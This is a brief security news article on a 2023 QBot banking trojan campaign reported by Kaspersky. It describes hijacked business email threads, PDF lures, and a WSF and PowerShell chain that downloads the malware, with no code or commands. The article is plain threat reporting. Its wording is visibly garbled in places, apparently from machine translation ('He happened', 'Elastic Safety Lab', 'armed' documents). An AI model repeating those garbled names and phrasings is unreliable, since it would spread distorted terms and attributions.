New QBot Banking Trojan Campaign Hijacks Business Emails to Spread Malware
New QBot malware campaign leverages hijacked business correspondence to trick unsuspecting victims into installing malware, new findings from Kaspersky reveal.
The most recent activity, which started on April 4, 2023, mainly targets users in Germany, Argentina, Italy, Algeria, Spain, US, Russia, France, UK and Morocco.
QBot (aka Qakbot or Pinkslipbot) is a banking trojans which is known to be active since at least 2007. As well as stealing passwords and cookies from web browsers, it doubles as a backdoor to inject next-stage payloads like Cobalt Strike or ransomware.
Distributed via phishing campaigns, the malware has seen constant updates throughout its lifetime packaged in anti-VM, anti-debugging, and anti-sandbox techniques to evade detection. He also appears as most common malware for March 2023, per Check Point.
“Initially, it was distributed via infected websites and pirated software,” Kaspersky researchers said, describes the QBot distribution method. “Now bankers are delivered to potential victims via malware already on their computers, social engineering, and spam mail.”
Email thread hijacking attacks are nothing new. He happened when cyber criminals insert themselves into existing business conversations or start new ones based on information previously collected by compromised email accounts.
The goal is to induce victims to open a malicious link or malicious attachment, in this case, an attached PDF file disguised as a Microsoft Office 365 or Microsoft Azure warning.
Master the Art of Dark Web Intelligence Gathering
Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!
Opening the document leads to retrieving an archive file from the infected website which, in turn, contains an obfuscated Windows Script File (.WSF). The script, for its part, incorporates a PowerShell script that downloads malicious DLLs from a remote server. The downloaded DLL is QBot malware.
The findings come as the Elastic Safety Lab excavated a multi-stage social engineering campaign that uses armed Microsoft Word documents to distribute Agent Tesla and XWorm via a custom .NET based loader.